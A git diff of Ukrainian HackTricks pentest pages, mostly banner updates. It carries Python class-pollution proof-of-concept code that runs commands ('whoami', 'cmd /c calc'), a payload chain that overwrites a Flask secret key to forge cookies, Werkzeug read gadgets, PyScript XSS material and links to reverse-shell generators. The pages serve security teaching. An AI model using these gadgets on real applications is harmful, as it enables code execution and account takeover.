-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md b/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md index b2af21e24..5e5b8f07b 100644 --- a/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md +++ b/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md @@ -1,23 +1,23 @@ -# Class Pollution (Python's Prototype Pollution) +# Забруднення класу (Прототипне забруднення Python) + +{% hint style="success" %} +Вивчайте та вправляйтесь в хакінгу AWS: [**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та вправляйтесь в хакінгу GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! * **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Базовий Приклад Перевірте, як можливо забруднювати класи об'єктів рядками: - ```python class Company: pass class Developer(Company): pass @@ -41,9 +41,7 @@ e.__class__.__base__.__base__.__qualname__ = 'Polluted_Company' print(d) #<__main__.Polluted_Developer object at 0x1041d2b80> print(c) #<__main__.Polluted_Company object at 0x1043a72b0> ``` - ## Базовий Приклад Вразливості - ```python # Initial state class Employee: pass @@ -76,36 +74,57 @@ USER_INPUT = { merge(USER_INPUT, emp) print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}} ``` - -## Приклади гаджетів +## Приклади пристроїв
Створення значення за замовчуванням властивості класу для RCE (підпроцес) +```python +from os import popen +class Employee: pass # Creating an empty class +class HR(Employee): pass # Class inherits from Employee class +class Recruiter(HR): pass # Class inherits from HR class -\`\`\`python from os import popen class Employee: pass # Creating an empty class class HR(Employee): pass # Class inherits from Employee class class Recruiter(HR): pass # Class inherits from HR class - -class SystemAdmin(Employee): # Class inherits from Employee class def execute\_command(self): command = self.custom\_command if hasattr(self, 'custom\_command') else 'echo Hello there' return f'\[!] Executing: "{command}", output: "{popen(command).read().strip()}"' +class SystemAdmin(Employee): # Class inherits from Employee class +def execute_command(self): +command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there' +return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"' def merge(src, dst): +# Recursive merge function +for k, v in src.items(): +if hasattr(dst, '__getitem__'): +if dst.get(k) and type(v) == dict: +merge(v, dst.get(k)) +else: +dst[k] = v +elif hasattr(dst, k) and type(v) == dict: +merge(v, getattr(dst, k)) +else: +setattr(dst, k, v) -## Recursive merge function +USER_INPUT = { +"__class__":{ +"__base__":{ +"__base__":{ +"custom_command": "whoami" +} +} +} +} -for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) +recruiter_emp = Recruiter() +system_admin_emp = SystemAdmin() -USER\_INPUT = { "**class**":{ "**base**":{ "**base**":{ "custom\_command": "whoami" } } } } +print(system_admin_emp.execute_command()) +#> [!] Executing: "echo Hello there", output: "Hello there" -recruiter\_emp = Recruiter() system\_admin\_emp = SystemAdmin() +# Create default value for Employee.custom_command +merge(USER_INPUT, recruiter_emp) -print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "echo Hello there", output: "Hello there" - -## Create default value for Employee.custom\_command - -merge(USER\_INPUT, recruiter\_emp) - -print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "whoami", output: "abdulrah33m" - -```` +print(system_admin_emp.execute_command()) +#> [!] Executing: "whoami", output: "abdulrah33m" +```
@@ -137,33 +156,39 @@ merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Pollut print(not_accessible_variable) #> Polluted variable print(NotAccessibleClass) #> -```` - +```
Довільне виконання підпроцесу +```python +import subprocess, json -\`\`\`python import subprocess, json - -class Employee: def **init**(self): pass +class Employee: +def __init__(self): +pass def merge(src, dst): +# Recursive merge function +for k, v in src.items(): +if hasattr(dst, '__getitem__'): +if dst.get(k) and type(v) == dict: +merge(v, dst.get(k)) +else: +dst[k] = v +elif hasattr(dst, k) and type(v) == dict: +merge(v, getattr(dst, k)) +else: +setattr(dst, k, v) -## Recursive merge function +# Overwrite env var "COMSPEC" to execute a calc +USER_INPUT = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value -for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) - -## Overwrite env var "COMSPEC" to execute a calc - -USER\_INPUT = json.loads('{"**init**":{"**globals**":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"\}}\}}\}}') # attacker-controlled value - -merge(USER\_INPUT, Employee()) +merge(USER_INPUT, Employee()) subprocess.Popen('whoami', shell=True) # Calc.exe will pop up - -```` +```
@@ -206,25 +231,22 @@ merge(emp_info, Employee()) print(execute.__kwdefaults__) #> {'command': 'echo Polluted'} execute() #> Executing echo Polluted #> Polluted -```` - +```
Перезапис Flask секрету через файли -Таким чином, якщо ви можете зробити забруднення класу над об'єктом, визначеним у головному файлі Python веб-сайту, але **клас визначено в іншому файлі**, ніж головний. Оскільки для доступу до \_\_globals\_\_ у попередніх політрях вам потрібно отримати доступ до класу об'єкта або методів класу, ви зможете **отримати доступ до глобальних змінних у цьому файлі, але не в головному**.\ +Отже, якщо ви можете здійснити забруднення класу над об'єктом, визначеним у головному файлі Python веб-сайту, але **клас визначено в іншому файлі**, ніж головний. Оскільки для доступу до \_\_globals\_\_ у попередніх завантаженнях вам потрібно отримати доступ до класу об'єкта або методів класу, ви зможете **отримати доступ до глобальних змінних у цьому файлі, але не в головному**. \ Отже, ви **не зможете отримати доступ до глобального об'єкта Flask app**, який визначив **секретний ключ** на головній сторінці: - ```python app = Flask(__name__, template_folder='templates') app.secret_key = '(:secret:)' ``` +У цьому сценарії вам потрібен гаджет для обходу файлів, щоб дістатися до основного, щоб **отримати доступ до глобального об'єкту `app.secret_key`** для зміни секретного ключа Flask та можливості [**підвищення привілеїв** знавши цей ключ](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign). -У цьому сценарії вам потрібен гаджет для обходу файлів, щоб дістатися до основного, щоб **отримати доступ до глобального об'єкту `app.secret_key`** для зміни секретного ключа Flask та мати можливість [**підвищення привілеїв** знавши цей ключ](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign). - -Пейлоад, подібний до цього [з цього опису](https://ctftime.org/writeup/36082): +Пейлоад, подібний до цього [з цього огляду](https://ctftime.org/writeup/36082): {% code overflow="wrap" %} ```python @@ -232,11 +254,11 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se ``` {% endcode %} -Використовуйте цей пейлоад, щоб **змінити `app.secret_key`** (назва в вашому додатку може бути іншою), щоб мати змогу підписувати нові та більш привілеї flask cookies. +Використовуйте цей пейлоад, щоб **змінити `app.secret_key`** (назва в вашому додатку може бути іншою), щоб мати змогу підписувати нові та більш привілейовані куки у фреймворку Flask.
-Перевірте також наступну сторінку для більше гаджетів лише для читання: +Також перевірте наступну сторінку для отримання більше гаджетів лише для читання: {% content-ref url="python-internal-read-gadgets.md" %} [python-internal-read-gadgets.md](python-internal-read-gadgets.md) @@ -246,16 +268,17 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se * [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримати HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/python/pyscript.md b/generic-methodologies-and-resources/python/pyscript.md index 3e1ec2eb2..4dbc35cf8 100644 --- a/generic-methodologies-and-resources/python/pyscript.md +++ b/generic-methodologies-and-resources/python/pyscript.md @@ -1,26 +1,27 @@ # Pyscript +{% hint style="success" %} +Вивчайте та вправляйтеся в хакінгу AWS: [**Школа хакінгу HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та вправляйтеся в хакінгу GCP: [**Школа хакінгу HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -## Посібник з тестування на проникнення PyScript +## Посібник з пентесту PyScript -PyScript - це нова платформа, розроблена для інтеграції Python у HTML, щоб його можна було використовувати разом з HTML. У цьому шпаргалці ви знайдете, як використовувати PyScript для ваших цілей тестування на проникнення. +PyScript - це нова платформа, розроблена для інтеграції Python у HTML, щоб його можна було використовувати разом з HTML. У цьому шпаргалці ви знайдете, як використовувати PyScript для ваших цілей пентесту. -### Вивантаження / Отримання файлів з файлової системи віртуальної пам'яті Emscripten: +### Витягування / Отримання файлів з файлової системи віртуальної пам'яті Emscripten: -`ID CVE: CVE-2022-30286`\ +`CVE ID: CVE-2022-30286`\ \ Код: ```html @@ -65,7 +66,7 @@ print("") ![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png) -### Міжсайтовий скриптінг (Python Замаскований) +### Міжсайтовий скриптинг (Python замаскований) Код: ```python @@ -83,7 +84,7 @@ print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p) ![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png) -### Міжсайтовий скриптінг (Замаскування JavaScript) +### Міжсайтовий скриптінг (обфускація JavaScript) Код: ```html @@ -108,16 +109,17 @@ print("            & ![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png) +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/python/python-internal-read-gadgets.md b/generic-methodologies-and-resources/python/python-internal-read-gadgets.md index 689915482..a6e904a2e 100644 --- a/generic-methodologies-and-resources/python/python-internal-read-gadgets.md +++ b/generic-methodologies-and-resources/python/python-internal-read-gadgets.md @@ -1,33 +1,34 @@ -# Внутрішні гаджети Python для читання +# Внутрішні гаджети Python + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Основна інформація -Різні вразливості, такі як [**Python Format Strings**](bypass-python-sandboxes/#python-format-string) або [**Class Pollution**](class-pollution-pythons-prototype-pollution.md), можуть дозволити вам **читати внутрішні дані Python, але не дозволять виконувати код**. Тому пентестеру потрібно максимально використовувати ці дозволи на читання, щоб **отримати чутливі привілеї та ескалювати вразливість**. +Різні вразливості, такі як [**Рядки формату Python**](bypass-python-sandboxes/#python-format-string) або [**Забруднення класу**](class-pollution-pythons-prototype-pollution.md) можуть дозволити вам **читати внутрішні дані Python, але не дозволять виконувати код**. Тому пентестеру потрібно максимально використовувати ці дозволи на читання, щоб **отримати чутливі привілеї та ескалювати вразливість**. ### Flask - Читання секретного ключа -На головній сторінці додатка Flask, ймовірно, буде **глобальний об'єкт `app`, де налаштований цей **секрет**. +На головній сторінці додатка Flask, ймовірно, буде **глобальний об'єкт `app`, де цей **секрет налаштований**. ```python app = Flask(__name__, template_folder='templates') app.secret_key = '(:secret:)' ``` У цьому випадку можливий доступ до цього об'єкту, просто використовуючи будь-який гаджет для **доступу до глобальних об'єктів** зі сторінки [**Bypass Python sandboxes**](bypass-python-sandboxes/). -У випадку, коли **вразливість знаходиться в іншому файлі Python**, вам потрібен гаджет для перегляду файлів, щоб дістатися до основного файлу для **доступу до глобального об'єкту `app.secret_key`** для зміни секретного ключа Flask і можливості [**підвищення привілеїв** знавши цей ключ](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign). +У випадку, коли **вразливість знаходиться в іншому файлі Python**, вам потрібен гаджет для переходу між файлами, щоб отримати доступ до основного, щоб **отримати доступ до глобального об'єкту `app.secret_key`** для зміни секретного ключа Flask і мати можливість [**підвищення привілеїв** знавши цей ключ](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign). Пейлоад, подібний до цього [з цього опису](https://ctftime.org/writeup/36082): @@ -37,7 +38,7 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se ``` {% endcode %} -Використовуйте цей вразливий код, щоб **змінити `app.secret_key`** (назва в вашому додатку може бути іншою), щоб мати можливість підписувати нові та більш привілейовані куки flask. +Використовуйте цей вразливий код для **зміни `app.secret_key`** (назва в вашому додатку може бути іншою), щоб мати можливість підписувати нові та більш привілейовані куки flask. ### Werkzeug - machine\_id та node uuid @@ -47,21 +48,22 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se {ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node} ``` {% hint style="warning" %} -Зверніть увагу, що ви можете отримати **локальний шлях сервера до `app.py`**, спричиняючи деяку **помилку** на веб-сторінці, яка **надасть вам шлях**. +Зверніть увагу, що ви можете отримати **локальний шлях сервера до `app.py`**, спровокувавши деяку **помилку** на веб-сторінці, яка **поверне вам шлях**. {% endhint %} -Якщо вразливість знаходиться в іншому файлі Python, перевірте попередній трюк Flask, щоб отримати доступ до об'єктів з основного файлу Python. +Якщо вразливість знаходиться в іншому файлі Python, перевірте попередній трюк Flask для доступу до об'єктів з основного файлу Python. + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/shells/README.md b/generic-methodologies-and-resources/shells/README.md index 08f0754ec..b1b610f29 100644 --- a/generic-methodologies-and-resources/shells/README.md +++ b/generic-methodologies-and-resources/shells/README.md @@ -1,27 +1,28 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -# [**Shells - Linux**](linux.md) +# [**Шелі - Linux**](linux.md) -# [**Shells - Windows**](windows.md) +# [**Шелі - Windows**](windows.md) # [**MSFVenom - Шпаргалка**](msfvenom.md) # [**Повні TTYs**](full-ttys.md) -# **Автоматично згенеровані оболонки** +# **Автоматично згенеровані шелі** * [**https://reverse-shell.sh/**](https://reverse-shell.sh/) * [**https://www.revshells.com/**](https://www.revshells.com/) @@ -36,16 +37,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
